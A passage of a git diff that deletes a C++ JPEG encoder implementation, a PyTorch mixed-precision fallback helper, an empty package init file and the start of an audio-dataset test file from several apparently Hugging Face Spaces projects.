code_list_len, int max_code_size) -{ - if (code_list_len <= 1) return; - - for (int i = max_code_size + 1; i <= MAX_HUFF_CODESIZE; i++) pNum_codes[max_code_size] += pNum_codes[i]; - - uint32 total = 0; - for (int i = max_code_size; i > 0; i--) - total += (((uint32)pNum_codes[i]) << (max_code_size - i)); - - while (total != (1UL << max_code_size)) - { - pNum_codes[max_code_size]--; - for (int i = max_code_size - 1; i > 0; i--) - { - if (pNum_codes[i]) { pNum_codes[i]--; pNum_codes[i + 1] += 2; break; } - } - total--; - } -} - -// Generates an optimized Huffman table. -void jpeg_encoder::optimize_huffman_table(int table_num, int table_len) -{ - sym_freq syms0[MAX_HUFF_SYMBOLS], syms1[MAX_HUFF_SYMBOLS]; - syms0[0].m_key = 1; syms0[0].m_sym_index = 0; // dummy symbol, assures that no valid code contains all 1's - int num_used_syms = 1; - const uint32 *pSym_count = &m_huff_count[table_num][0]; - for (int i = 0; i < table_len; i++) - if (pSym_count[i]) { syms0[num_used_syms].m_key = pSym_count[i]; syms0[num_used_syms++].m_sym_index = i + 1; } - sym_freq* pSyms = radix_sort_syms(num_used_syms, syms0, syms1); - calculate_minimum_redundancy(pSyms, num_used_syms); - - // Count the # of symbols of each code size. 
-  int num_codes[1 + MAX_HUFF_CODESIZE]; clear_obj(num_codes);
-  for (int i = 0; i < num_used_syms; i++)
-    num_codes[pSyms[i].m_key]++;
-
-  const uint JPGE_CODE_SIZE_LIMIT = 16; // the maximum possible size of a JPEG Huffman code (valid range is [9,16] - 9 vs. 8 because of the dummy symbol)
-  huffman_enforce_max_code_size(num_codes, num_used_syms, JPGE_CODE_SIZE_LIMIT);
-
-  // Compute m_huff_bits array, which contains the # of symbols per code size.
-  clear_obj(m_huff_bits[table_num]);
-  for (int i = 1; i <= (int)JPGE_CODE_SIZE_LIMIT; i++)
-    m_huff_bits[table_num][i] = static_cast<uint8>(num_codes[i]);
-
-  // Remove the dummy symbol added above, which must be in largest bucket.
-  for (int i = JPGE_CODE_SIZE_LIMIT; i >= 1; i--)
-  {
-    if (m_huff_bits[table_num][i]) { m_huff_bits[table_num][i]--; break; }
-  }
-
-  // Compute the m_huff_val array, which contains the symbol indices sorted by code size (smallest to largest).
-  for (int i = num_used_syms - 1; i >= 1; i--)
-    m_huff_val[table_num][num_used_syms - 1 - i] = static_cast<uint8>(pSyms[i].m_sym_index - 1);
-}
-
-// JPEG marker generation.
-void jpeg_encoder::emit_byte(uint8 i)
-{
-  m_all_stream_writes_succeeded = m_all_stream_writes_succeeded && m_pStream->put_obj(i);
-}
-
-void jpeg_encoder::emit_word(uint i)
-{
-  emit_byte(uint8(i >> 8)); emit_byte(uint8(i & 0xFF));
-}
-
-void jpeg_encoder::emit_marker(int marker)
-{
-  emit_byte(uint8(0xFF)); emit_byte(uint8(marker));
-}
-
-// Emit JFIF marker
-void jpeg_encoder::emit_jfif_app0()
-{
-  emit_marker(M_APP0);
-  emit_word(2 + 4 + 1 + 2 + 1 + 2 + 2 + 1 + 1);
-  emit_byte(0x4A); emit_byte(0x46); emit_byte(0x49); emit_byte(0x46); /* Identifier: ASCII "JFIF" */
-  emit_byte(0);
-  emit_byte(1);      /* Major version */
-  emit_byte(1);      /* Minor version */
-  emit_byte(0);      /* Density unit */
-  emit_word(1);
-  emit_word(1);
-  emit_byte(0);      /* No thumbnail image */
-  emit_byte(0);
-}
-
-// Emit quantization tables
-void jpeg_encoder::emit_dqt()
-{
-  for (int i = 0; i < ((m_num_components == 3) ?
2 : 1); i++)
-  {
-    emit_marker(M_DQT);
-    emit_word(64 + 1 + 2);
-    emit_byte(static_cast<uint8>(i));
-    for (int j = 0; j < 64; j++)
-      emit_byte(static_cast<uint8>(m_quantization_tables[i][j]));
-  }
-}
-
-// Emit start of frame marker
-void jpeg_encoder::emit_sof()
-{
-  emit_marker(M_SOF0);                           /* baseline */
-  emit_word(3 * m_num_components + 2 + 5 + 1);
-  emit_byte(8);                                  /* precision */
-  emit_word(m_image_y);
-  emit_word(m_image_x);
-  emit_byte(m_num_components);
-  for (int i = 0; i < m_num_components; i++)
-  {
-    emit_byte(static_cast<uint8>(i + 1));                                   /* component ID     */
-    emit_byte((m_comp_h_samp[i] << 4) + m_comp_v_samp[i]);  /* h and v sampling */
-    emit_byte(i > 0);                                   /* quant. table num */
-  }
-}
-
-// Emit Huffman table.
-void jpeg_encoder::emit_dht(uint8 *bits, uint8 *val, int index, bool ac_flag)
-{
-  emit_marker(M_DHT);
-
-  int length = 0;
-  for (int i = 1; i <= 16; i++)
-    length += bits[i];
-
-  emit_word(length + 2 + 1 + 16);
-  emit_byte(static_cast<uint8>(index + (ac_flag << 4)));
-
-  for (int i = 1; i <= 16; i++)
-    emit_byte(bits[i]);
-
-  for (int i = 0; i < length; i++)
-    emit_byte(val[i]);
-}
-
-// Emit all Huffman tables.
-void jpeg_encoder::emit_dhts()
-{
-  emit_dht(m_huff_bits[0+0], m_huff_val[0+0], 0, false);
-  emit_dht(m_huff_bits[2+0], m_huff_val[2+0], 0, true);
-  if (m_num_components == 3)
-  {
-    emit_dht(m_huff_bits[0+1], m_huff_val[0+1], 1, false);
-    emit_dht(m_huff_bits[2+1], m_huff_val[2+1], 1, true);
-  }
-}
-
-// emit start of scan
-void jpeg_encoder::emit_sos()
-{
-  emit_marker(M_SOS);
-  emit_word(2 * m_num_components + 2 + 1 + 3);
-  emit_byte(m_num_components);
-  for (int i = 0; i < m_num_components; i++)
-  {
-    emit_byte(static_cast<uint8>(i + 1));
-    if (i == 0)
-      emit_byte((0 << 4) + 0);
-    else
-      emit_byte((1 << 4) + 1);
-  }
-  emit_byte(0);     /* spectral selection */
-  emit_byte(63);
-  emit_byte(0);
-}
-
-// Emit all markers at beginning of image file.
-void jpeg_encoder::emit_markers() -{ - emit_marker(M_SOI); - emit_jfif_app0(); - emit_dqt(); - emit_sof(); - emit_dhts(); - emit_sos(); -} - -// Compute the actual canonical Huffman codes/code sizes given the JPEG huff bits and val arrays. -void jpeg_encoder::compute_huffman_table(uint *codes, uint8 *code_sizes, uint8 *bits, uint8 *val) -{ - int i, l, last_p, si; - uint8 huff_size[257]; - uint huff_code[257]; - uint code; - - int p = 0; - for (l = 1; l <= 16; l++) - for (i = 1; i <= bits[l]; i++) - huff_size[p++] = (char)l; - - huff_size[p] = 0; last_p = p; // write sentinel - - code = 0; si = huff_size[0]; p = 0; - - while (huff_size[p]) - { - while (huff_size[p] == si) - huff_code[p++] = code++; - code <<= 1; - si++; - } - - memset(codes, 0, sizeof(codes[0])*256); - memset(code_sizes, 0, sizeof(code_sizes[0])*256); - for (p = 0; p < last_p; p++) - { - codes[val[p]] = huff_code[p]; - code_sizes[val[p]] = huff_size[p]; - } -} - -// Quantization table generation. -void jpeg_encoder::compute_quant_table(int32 *pDst, int16 *pSrc) -{ - int32 q; - if (m_params.m_quality < 50) - q = 5000 / m_params.m_quality; - else - q = 200 - m_params.m_quality * 2; - for (int i = 0; i < 64; i++) - { - int32 j = *pSrc++; j = (j * q + 50L) / 100L; - *pDst++ = JPGE_MIN(JPGE_MAX(j, 1), 255); - } -} - -// Higher-level methods. 
-void jpeg_encoder::first_pass_init() -{ - m_bit_buffer = 0; m_bits_in = 0; - memset(m_last_dc_val, 0, 3 * sizeof(m_last_dc_val[0])); - m_mcu_y_ofs = 0; - m_pass_num = 1; -} - -bool jpeg_encoder::second_pass_init() -{ - compute_huffman_table(&m_huff_codes[0+0][0], &m_huff_code_sizes[0+0][0], m_huff_bits[0+0], m_huff_val[0+0]); - compute_huffman_table(&m_huff_codes[2+0][0], &m_huff_code_sizes[2+0][0], m_huff_bits[2+0], m_huff_val[2+0]); - if (m_num_components > 1) - { - compute_huffman_table(&m_huff_codes[0+1][0], &m_huff_code_sizes[0+1][0], m_huff_bits[0+1], m_huff_val[0+1]); - compute_huffman_table(&m_huff_codes[2+1][0], &m_huff_code_sizes[2+1][0], m_huff_bits[2+1], m_huff_val[2+1]); - } - first_pass_init(); - emit_markers(); - m_pass_num = 2; - return true; -} - -bool jpeg_encoder::jpg_open(int p_x_res, int p_y_res, int src_channels) -{ - m_num_components = 3; - switch (m_params.m_subsampling) - { - case Y_ONLY: - { - m_num_components = 1; - m_comp_h_samp[0] = 1; m_comp_v_samp[0] = 1; - m_mcu_x = 8; m_mcu_y = 8; - break; - } - case H1V1: - { - m_comp_h_samp[0] = 1; m_comp_v_samp[0] = 1; - m_comp_h_samp[1] = 1; m_comp_v_samp[1] = 1; - m_comp_h_samp[2] = 1; m_comp_v_samp[2] = 1; - m_mcu_x = 8; m_mcu_y = 8; - break; - } - case H2V1: - { - m_comp_h_samp[0] = 2; m_comp_v_samp[0] = 1; - m_comp_h_samp[1] = 1; m_comp_v_samp[1] = 1; - m_comp_h_samp[2] = 1; m_comp_v_samp[2] = 1; - m_mcu_x = 16; m_mcu_y = 8; - break; - } - case H2V2: - { - m_comp_h_samp[0] = 2; m_comp_v_samp[0] = 2; - m_comp_h_samp[1] = 1; m_comp_v_samp[1] = 1; - m_comp_h_samp[2] = 1; m_comp_v_samp[2] = 1; - m_mcu_x = 16; m_mcu_y = 16; - } - } - - m_image_x = p_x_res; m_image_y = p_y_res; - m_image_bpp = src_channels; - m_image_bpl = m_image_x * src_channels; - m_image_x_mcu = (m_image_x + m_mcu_x - 1) & (~(m_mcu_x - 1)); - m_image_y_mcu = (m_image_y + m_mcu_y - 1) & (~(m_mcu_y - 1)); - m_image_bpl_xlt = m_image_x * m_num_components; - m_image_bpl_mcu = m_image_x_mcu * m_num_components; - m_mcus_per_row = 
m_image_x_mcu / m_mcu_x;
-
-  if ((m_mcu_lines[0] = static_cast<uint8*>(jpge_malloc(m_image_bpl_mcu * m_mcu_y))) == NULL) return false;
-  for (int i = 1; i < m_mcu_y; i++)
-    m_mcu_lines[i] = m_mcu_lines[i-1] + m_image_bpl_mcu;
-
-  compute_quant_table(m_quantization_tables[0], s_std_lum_quant);
-  compute_quant_table(m_quantization_tables[1], m_params.m_no_chroma_discrim_flag ? s_std_lum_quant : s_std_croma_quant);
-
-  m_out_buf_left = JPGE_OUT_BUF_SIZE;
-  m_pOut_buf = m_out_buf;
-
-  if (m_params.m_two_pass_flag)
-  {
-    clear_obj(m_huff_count);
-    first_pass_init();
-  }
-  else
-  {
-    memcpy(m_huff_bits[0+0], s_dc_lum_bits, 17);    memcpy(m_huff_val [0+0], s_dc_lum_val, DC_LUM_CODES);
-    memcpy(m_huff_bits[2+0], s_ac_lum_bits, 17);    memcpy(m_huff_val [2+0], s_ac_lum_val, AC_LUM_CODES);
-    memcpy(m_huff_bits[0+1], s_dc_chroma_bits, 17); memcpy(m_huff_val [0+1], s_dc_chroma_val, DC_CHROMA_CODES);
-    memcpy(m_huff_bits[2+1], s_ac_chroma_bits, 17); memcpy(m_huff_val [2+1], s_ac_chroma_val, AC_CHROMA_CODES);
-    if (!second_pass_init()) return false;   // in effect, skip over the first pass
-  }
-  return m_all_stream_writes_succeeded;
-}
-
-void jpeg_encoder::load_block_8_8_grey(int x)
-{
-  uint8 *pSrc;
-  sample_array_t *pDst = m_sample_array;
-  x <<= 3;
-  for (int i = 0; i < 8; i++, pDst += 8)
-  {
-    pSrc = m_mcu_lines[i] + x;
-    pDst[0] = pSrc[0] - 128; pDst[1] = pSrc[1] - 128; pDst[2] = pSrc[2] - 128; pDst[3] = pSrc[3] - 128;
-    pDst[4] = pSrc[4] - 128; pDst[5] = pSrc[5] - 128; pDst[6] = pSrc[6] - 128; pDst[7] = pSrc[7] - 128;
-  }
-}
-
-void jpeg_encoder::load_block_8_8(int x, int y, int c)
-{
-  uint8 *pSrc;
-  sample_array_t *pDst = m_sample_array;
-  x = (x * (8 * 3)) + c;
-  y <<= 3;
-  for (int i = 0; i < 8; i++, pDst += 8)
-  {
-    pSrc = m_mcu_lines[y + i] + x;
-    pDst[0] = pSrc[0 * 3] - 128; pDst[1] = pSrc[1 * 3] - 128; pDst[2] = pSrc[2 * 3] - 128; pDst[3] = pSrc[3 * 3] - 128;
-    pDst[4] = pSrc[4 * 3] - 128; pDst[5] = pSrc[5 * 3] - 128; pDst[6] = pSrc[6 * 3] - 128; pDst[7] = pSrc[7 * 3] - 128;
-  }
-} - -void jpeg_encoder::load_block_16_8(int x, int c) -{ - uint8 *pSrc1, *pSrc2; - sample_array_t *pDst = m_sample_array; - x = (x * (16 * 3)) + c; - int a = 0, b = 2; - for (int i = 0; i < 16; i += 2, pDst += 8) - { - pSrc1 = m_mcu_lines[i + 0] + x; - pSrc2 = m_mcu_lines[i + 1] + x; - pDst[0] = ((pSrc1[ 0 * 3] + pSrc1[ 1 * 3] + pSrc2[ 0 * 3] + pSrc2[ 1 * 3] + a) >> 2) - 128; pDst[1] = ((pSrc1[ 2 * 3] + pSrc1[ 3 * 3] + pSrc2[ 2 * 3] + pSrc2[ 3 * 3] + b) >> 2) - 128; - pDst[2] = ((pSrc1[ 4 * 3] + pSrc1[ 5 * 3] + pSrc2[ 4 * 3] + pSrc2[ 5 * 3] + a) >> 2) - 128; pDst[3] = ((pSrc1[ 6 * 3] + pSrc1[ 7 * 3] + pSrc2[ 6 * 3] + pSrc2[ 7 * 3] + b) >> 2) - 128; - pDst[4] = ((pSrc1[ 8 * 3] + pSrc1[ 9 * 3] + pSrc2[ 8 * 3] + pSrc2[ 9 * 3] + a) >> 2) - 128; pDst[5] = ((pSrc1[10 * 3] + pSrc1[11 * 3] + pSrc2[10 * 3] + pSrc2[11 * 3] + b) >> 2) - 128; - pDst[6] = ((pSrc1[12 * 3] + pSrc1[13 * 3] + pSrc2[12 * 3] + pSrc2[13 * 3] + a) >> 2) - 128; pDst[7] = ((pSrc1[14 * 3] + pSrc1[15 * 3] + pSrc2[14 * 3] + pSrc2[15 * 3] + b) >> 2) - 128; - int temp = a; a = b; b = temp; - } -} - -void jpeg_encoder::load_block_16_8_8(int x, int c) -{ - uint8 *pSrc1; - sample_array_t *pDst = m_sample_array; - x = (x * (16 * 3)) + c; - for (int i = 0; i < 8; i++, pDst += 8) - { - pSrc1 = m_mcu_lines[i + 0] + x; - pDst[0] = ((pSrc1[ 0 * 3] + pSrc1[ 1 * 3]) >> 1) - 128; pDst[1] = ((pSrc1[ 2 * 3] + pSrc1[ 3 * 3]) >> 1) - 128; - pDst[2] = ((pSrc1[ 4 * 3] + pSrc1[ 5 * 3]) >> 1) - 128; pDst[3] = ((pSrc1[ 6 * 3] + pSrc1[ 7 * 3]) >> 1) - 128; - pDst[4] = ((pSrc1[ 8 * 3] + pSrc1[ 9 * 3]) >> 1) - 128; pDst[5] = ((pSrc1[10 * 3] + pSrc1[11 * 3]) >> 1) - 128; - pDst[6] = ((pSrc1[12 * 3] + pSrc1[13 * 3]) >> 1) - 128; pDst[7] = ((pSrc1[14 * 3] + pSrc1[15 * 3]) >> 1) - 128; - } -} - -void jpeg_encoder::load_quantized_coefficients(int component_num) -{ - int32 *q = m_quantization_tables[component_num > 0]; - int16 *pDst = m_coefficient_array; - for (int i = 0; i < 64; i++) - { - sample_array_t j = m_sample_array[s_zag[i]]; - 
if (j < 0) - { - if ((j = -j + (*q >> 1)) < *q) - *pDst++ = 0; - else - *pDst++ = static_cast(-(j / *q)); - } - else - { - if ((j = j + (*q >> 1)) < *q) - *pDst++ = 0; - else - *pDst++ = static_cast((j / *q)); - } - q++; - } -} - -void jpeg_encoder::flush_output_buffer() -{ - if (m_out_buf_left != JPGE_OUT_BUF_SIZE) - m_all_stream_writes_succeeded = m_all_stream_writes_succeeded && m_pStream->put_buf(m_out_buf, JPGE_OUT_BUF_SIZE - m_out_buf_left); - m_pOut_buf = m_out_buf; - m_out_buf_left = JPGE_OUT_BUF_SIZE; -} - -void jpeg_encoder::put_bits(uint bits, uint len) -{ - m_bit_buffer |= ((uint32)bits << (24 - (m_bits_in += len))); - while (m_bits_in >= 8) - { - uint8 c; - #define JPGE_PUT_BYTE(c) { *m_pOut_buf++ = (c); if (--m_out_buf_left == 0) flush_output_buffer(); } - JPGE_PUT_BYTE(c = (uint8)((m_bit_buffer >> 16) & 0xFF)); - if (c == 0xFF) JPGE_PUT_BYTE(0); - m_bit_buffer <<= 8; - m_bits_in -= 8; - } -} - -void jpeg_encoder::code_coefficients_pass_one(int component_num) -{ - if (component_num >= 3) return; // just to shut up static analysis - int i, run_len, nbits, temp1; - int16 *src = m_coefficient_array; - uint32 *dc_count = component_num ? m_huff_count[0 + 1] : m_huff_count[0 + 0], *ac_count = component_num ? 
m_huff_count[2 + 1] : m_huff_count[2 + 0]; - - temp1 = src[0] - m_last_dc_val[component_num]; - m_last_dc_val[component_num] = src[0]; - if (temp1 < 0) temp1 = -temp1; - - nbits = 0; - while (temp1) - { - nbits++; temp1 >>= 1; - } - - dc_count[nbits]++; - for (run_len = 0, i = 1; i < 64; i++) - { - if ((temp1 = m_coefficient_array[i]) == 0) - run_len++; - else - { - while (run_len >= 16) - { - ac_count[0xF0]++; - run_len -= 16; - } - if (temp1 < 0) temp1 = -temp1; - nbits = 1; - while (temp1 >>= 1) nbits++; - ac_count[(run_len << 4) + nbits]++; - run_len = 0; - } - } - if (run_len) ac_count[0]++; -} - -void jpeg_encoder::code_coefficients_pass_two(int component_num) -{ - int i, j, run_len, nbits, temp1, temp2; - int16 *pSrc = m_coefficient_array; - uint *codes[2]; - uint8 *code_sizes[2]; - - if (component_num == 0) - { - codes[0] = m_huff_codes[0 + 0]; codes[1] = m_huff_codes[2 + 0]; - code_sizes[0] = m_huff_code_sizes[0 + 0]; code_sizes[1] = m_huff_code_sizes[2 + 0]; - } - else - { - codes[0] = m_huff_codes[0 + 1]; codes[1] = m_huff_codes[2 + 1]; - code_sizes[0] = m_huff_code_sizes[0 + 1]; code_sizes[1] = m_huff_code_sizes[2 + 1]; - } - - temp1 = temp2 = pSrc[0] - m_last_dc_val[component_num]; - m_last_dc_val[component_num] = pSrc[0]; - - if (temp1 < 0) - { - temp1 = -temp1; temp2--; - } - - nbits = 0; - while (temp1) - { - nbits++; temp1 >>= 1; - } - - put_bits(codes[0][nbits], code_sizes[0][nbits]); - if (nbits) put_bits(temp2 & ((1 << nbits) - 1), nbits); - - for (run_len = 0, i = 1; i < 64; i++) - { - if ((temp1 = m_coefficient_array[i]) == 0) - run_len++; - else - { - while (run_len >= 16) - { - put_bits(codes[1][0xF0], code_sizes[1][0xF0]); - run_len -= 16; - } - if ((temp2 = temp1) < 0) - { - temp1 = -temp1; - temp2--; - } - nbits = 1; - while (temp1 >>= 1) - nbits++; - j = (run_len << 4) + nbits; - put_bits(codes[1][j], code_sizes[1][j]); - put_bits(temp2 & ((1 << nbits) - 1), nbits); - run_len = 0; - } - } - if (run_len) - put_bits(codes[1][0], 
code_sizes[1][0]); -} - -void jpeg_encoder::code_block(int component_num) -{ - DCT2D(m_sample_array); - load_quantized_coefficients(component_num); - if (m_pass_num == 1) - code_coefficients_pass_one(component_num); - else - code_coefficients_pass_two(component_num); -} - -void jpeg_encoder::process_mcu_row() -{ - if (m_num_components == 1) - { - for (int i = 0; i < m_mcus_per_row; i++) - { - load_block_8_8_grey(i); code_block(0); - } - } - else if ((m_comp_h_samp[0] == 1) && (m_comp_v_samp[0] == 1)) - { - for (int i = 0; i < m_mcus_per_row; i++) - { - load_block_8_8(i, 0, 0); code_block(0); load_block_8_8(i, 0, 1); code_block(1); load_block_8_8(i, 0, 2); code_block(2); - } - } - else if ((m_comp_h_samp[0] == 2) && (m_comp_v_samp[0] == 1)) - { - for (int i = 0; i < m_mcus_per_row; i++) - { - load_block_8_8(i * 2 + 0, 0, 0); code_block(0); load_block_8_8(i * 2 + 1, 0, 0); code_block(0); - load_block_16_8_8(i, 1); code_block(1); load_block_16_8_8(i, 2); code_block(2); - } - } - else if ((m_comp_h_samp[0] == 2) && (m_comp_v_samp[0] == 2)) - { - for (int i = 0; i < m_mcus_per_row; i++) - { - load_block_8_8(i * 2 + 0, 0, 0); code_block(0); load_block_8_8(i * 2 + 1, 0, 0); code_block(0); - load_block_8_8(i * 2 + 0, 1, 0); code_block(0); load_block_8_8(i * 2 + 1, 1, 0); code_block(0); - load_block_16_8(i, 1); code_block(1); load_block_16_8(i, 2); code_block(2); - } - } -} - -bool jpeg_encoder::terminate_pass_one() -{ - optimize_huffman_table(0+0, DC_LUM_CODES); optimize_huffman_table(2+0, AC_LUM_CODES); - if (m_num_components > 1) - { - optimize_huffman_table(0+1, DC_CHROMA_CODES); optimize_huffman_table(2+1, AC_CHROMA_CODES); - } - return second_pass_init(); -} - -bool jpeg_encoder::terminate_pass_two() -{ - put_bits(0x7F, 7); - flush_output_buffer(); - emit_marker(M_EOI); - m_pass_num++; // purposely bump up m_pass_num, for debugging - return true; -} - -bool jpeg_encoder::process_end_of_image() -{ - if (m_mcu_y_ofs) - { - if (m_mcu_y_ofs < 16) // check here just to 
shut up static analysis
-    {
-      for (int i = m_mcu_y_ofs; i < m_mcu_y; i++)
-        memcpy(m_mcu_lines[i], m_mcu_lines[m_mcu_y_ofs - 1], m_image_bpl_mcu);
-    }
-
-    process_mcu_row();
-  }
-
-  if (m_pass_num == 1)
-    return terminate_pass_one();
-  else
-    return terminate_pass_two();
-}
-
-void jpeg_encoder::load_mcu(const void *pSrc)
-{
-  const uint8* Psrc = reinterpret_cast<const uint8*>(pSrc);
-
-  uint8* pDst = m_mcu_lines[m_mcu_y_ofs]; // OK to write up to m_image_bpl_xlt bytes to pDst
-
-  if (m_num_components == 1)
-  {
-    if (m_image_bpp == 4)
-      RGBA_to_Y(pDst, Psrc, m_image_x);
-    else if (m_image_bpp == 3)
-      RGB_to_Y(pDst, Psrc, m_image_x);
-    else
-      memcpy(pDst, Psrc, m_image_x);
-  }
-  else
-  {
-    if (m_image_bpp == 4)
-      RGBA_to_YCC(pDst, Psrc, m_image_x);
-    else if (m_image_bpp == 3)
-      RGB_to_YCC(pDst, Psrc, m_image_x);
-    else
-      Y_to_YCC(pDst, Psrc, m_image_x);
-  }
-
-  // Possibly duplicate pixels at end of scanline if not a multiple of 8 or 16
-  if (m_num_components == 1)
-    memset(m_mcu_lines[m_mcu_y_ofs] + m_image_bpl_xlt, pDst[m_image_bpl_xlt - 1], m_image_x_mcu - m_image_x);
-  else
-  {
-    const uint8 y = pDst[m_image_bpl_xlt - 3 + 0], cb = pDst[m_image_bpl_xlt - 3 + 1], cr = pDst[m_image_bpl_xlt - 3 + 2];
-    uint8 *q = m_mcu_lines[m_mcu_y_ofs] + m_image_bpl_xlt;
-    for (int i = m_image_x; i < m_image_x_mcu; i++)
-    {
-      *q++ = y; *q++ = cb; *q++ = cr;
-    }
-  }
-
-  if (++m_mcu_y_ofs == m_mcu_y)
-  {
-    process_mcu_row();
-    m_mcu_y_ofs = 0;
-  }
-}
-
-void jpeg_encoder::clear()
-{
-  m_mcu_lines[0] = NULL;
-  m_pass_num = 0;
-  m_all_stream_writes_succeeded = true;
-}
-
-jpeg_encoder::jpeg_encoder()
-{
-  clear();
-}
-
-jpeg_encoder::~jpeg_encoder()
-{
-  deinit();
-}
-
-bool jpeg_encoder::init(output_stream *pStream, int64_t width, int64_t height, int64_t src_channels, const params &comp_params)
-{
-  deinit();
-  if (((!pStream) || (width < 1) || (height < 1)) || ((src_channels != 1) && (src_channels != 3) && (src_channels != 4)) || (!comp_params.check_valid())) return false;
-  m_pStream = pStream;
-  m_params = comp_params;
-  return jpg_open(width, height, src_channels);
-}
-
-void jpeg_encoder::deinit()
-{
-  jpge_free(m_mcu_lines[0]);
-  clear();
-}
-
-bool jpeg_encoder::process_scanline(const void* pScanline)
-{
-  if ((m_pass_num < 1) || (m_pass_num > 2)) return false;
-  if (m_all_stream_writes_succeeded)
-  {
-    if (!pScanline)
-    {
-      if (!process_end_of_image()) return false;
-    }
-    else
-    {
-      load_mcu(pScanline);
-    }
-  }
-  return m_all_stream_writes_succeeded;
-}
-
-// Higher level wrappers/examples (optional).
-#include <stdio.h>
-
-class cfile_stream : public output_stream
-{
-   cfile_stream(const cfile_stream &);
-   cfile_stream &operator= (const cfile_stream &);
-
-   FILE* m_pFile;
-   bool m_bStatus;
-
-public:
-   cfile_stream() : m_pFile(NULL), m_bStatus(false) { }
-
-   virtual ~cfile_stream()
-   {
-      close();
-   }
-
-   bool open(const char *pFilename)
-   {
-      close();
-#if defined(_MSC_VER)
-      if (fopen_s(&m_pFile, pFilename, "wb") != 0)
-      {
-         return false;
-      }
-#else
-      m_pFile = fopen(pFilename, "wb");
-#endif
-      m_bStatus = (m_pFile != NULL);
-      return m_bStatus;
-   }
-
-   bool close()
-   {
-      if (m_pFile)
-      {
-         if (fclose(m_pFile) == EOF)
-         {
-            m_bStatus = false;
-         }
-         m_pFile = NULL;
-      }
-      return m_bStatus;
-   }
-
-   virtual bool put_buf(const void* pBuf, int64_t len)
-   {
-      m_bStatus = m_bStatus && (fwrite(pBuf, len, 1, m_pFile) == 1);
-      return m_bStatus;
-   }
-
-   uint get_size() const
-   {
-      return m_pFile ? ftell(m_pFile) : 0;
-   }
-};
-
-// Writes JPEG image to file.
-bool compress_image_to_jpeg_file(const char *pFilename, int64_t width, int64_t height, int64_t num_channels, const uint8 *pImage_data, const params &comp_params)
-{
-  cfile_stream dst_stream;
-  if (!dst_stream.open(pFilename))
-    return false;
-
-  jpge::jpeg_encoder dst_image;
-  if (!dst_image.init(&dst_stream, width, height, num_channels, comp_params))
-    return false;
-
-  for (uint pass_index = 0; pass_index < dst_image.get_total_passes(); pass_index++)
-  {
-    for (int64_t i = 0; i < height; i++)
-    {
-       // i, width, and num_channels are all 64bit
-       const uint8* pBuf = pImage_data + i * width * num_channels;
-       if (!dst_image.process_scanline(pBuf))
-          return false;
-    }
-    if (!dst_image.process_scanline(NULL))
-       return false;
-  }
-
-  dst_image.deinit();
-
-  return dst_stream.close();
-}
-
-class memory_stream : public output_stream
-{
-   memory_stream(const memory_stream &);
-   memory_stream &operator= (const memory_stream &);
-
-   uint8 *m_pBuf;
-   uint64_t m_buf_size, m_buf_ofs;
-
-public:
-   memory_stream(void *pBuf, uint64_t buf_size) : m_pBuf(static_cast<uint8*>(pBuf)), m_buf_size(buf_size), m_buf_ofs(0) { }
-
-   virtual ~memory_stream() { }
-
-   virtual bool put_buf(const void* pBuf, int64_t len)
-   {
-      uint64_t buf_remaining = m_buf_size - m_buf_ofs;
-      if ((uint64_t)len > buf_remaining)
-         return false;
-      memcpy(m_pBuf + m_buf_ofs, pBuf, len);
-      m_buf_ofs += len;
-      return true;
-   }
-
-   uint64_t get_size() const
-   {
-      return m_buf_ofs;
-   }
-};
-
-bool compress_image_to_jpeg_file_in_memory(void *pDstBuf, int64_t &buf_size, int64_t width, int64_t height, int64_t num_channels, const uint8 *pImage_data, const params &comp_params)
-{
-  if ((!pDstBuf) || (!buf_size))
-    return false;
-
-  memory_stream dst_stream(pDstBuf, buf_size);
-
-  buf_size = 0;
-
-  jpge::jpeg_encoder dst_image;
-  if (!dst_image.init(&dst_stream, width, height, num_channels, comp_params))
-    return false;
-
-  for (uint pass_index = 0; pass_index < dst_image.get_total_passes(); pass_index++)
-  {
-    for (int64_t i = 0;
i < height; i++) - { - const uint8* pScanline = pImage_data + i * width * num_channels; - if (!dst_image.process_scanline(pScanline)) - return false; - } - if (!dst_image.process_scanline(NULL)) - return false; - } - - dst_image.deinit(); - - buf_size = dst_stream.get_size(); - return true; -} - -} // namespace jpge \ No newline at end of file diff --git a/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/utils/amp.py b/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/utils/amp.py deleted file mode 100644 index ed97eb5b413a7f8375c3faa2135b0e3f3add230a..0000000000000000000000000000000000000000 --- a/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/utils/amp.py +++ /dev/null @@ -1,14 +0,0 @@ -from contextlib import contextmanager - -@contextmanager -def nullcontext(enter_result=None, **kwargs): - yield enter_result - -try: - from torch.cuda.amp import autocast, GradScaler, custom_fwd, custom_bwd -except: - print('[Warning] Library for automatic mixed precision is not found, AMP is disabled!!') - GradScaler = nullcontext - autocast = nullcontext - custom_fwd = nullcontext - custom_bwd = nullcontext \ No newline at end of file diff --git a/spaces/hasibzunair/fifa-tryon-demo/models/__init__.py b/spaces/hasibzunair/fifa-tryon-demo/models/__init__.py deleted file mode 100644 index 8a3f782535e343701ca598947ed76cdcc491d2ea..0000000000000000000000000000000000000000 --- a/spaces/hasibzunair/fifa-tryon-demo/models/__init__.py +++ /dev/null @@ -1 +0,0 @@ -# model_init diff --git a/spaces/hebert2099/MusicGen/tests/data/test_audio_dataset.py b/spaces/hebert2099/MusicGen/tests/data/test_audio_dataset.py deleted file mode 100644 index b69c9c397830738b73d6c229009f84b867cda801..0000000000000000000000000000000000000000 --- a/spaces/hebert2099/MusicGen/tests/data/test_audio_dataset.py +++ /dev/null @@ -1,352 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. 
-# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from functools import partial -from itertools import product -import json -import math -import os -import random -import typing as tp - -import pytest -import torch -from torch.utils.data import DataLoader - -from audiocraft.data.audio_dataset import ( - AudioDataset, - AudioMeta, - _get_audio_meta, - load_audio_meta, - save_audio_meta -) -from audiocraft.data.zip import PathInZip - -from ..common_utils import TempDirMixin, get_white_noise, save_wav - - -class TestAudioMeta(TempDirMixin): - - def test_get_audio_meta(self): - sample_rates = [8000, 16_000] - channels = [1, 2] - duration = 1. - for sample_rate, ch in product(sample_rates, channels): - n_frames = int(duration * sample_rate) - wav = get_white_noise(ch, n_frames) - path = self.get_temp_path('sample.wav') - save_wav(path, wav, sample_rate) - m = _get_audio_meta(path, minimal=True) - assert m.path == path, 'path does not match' 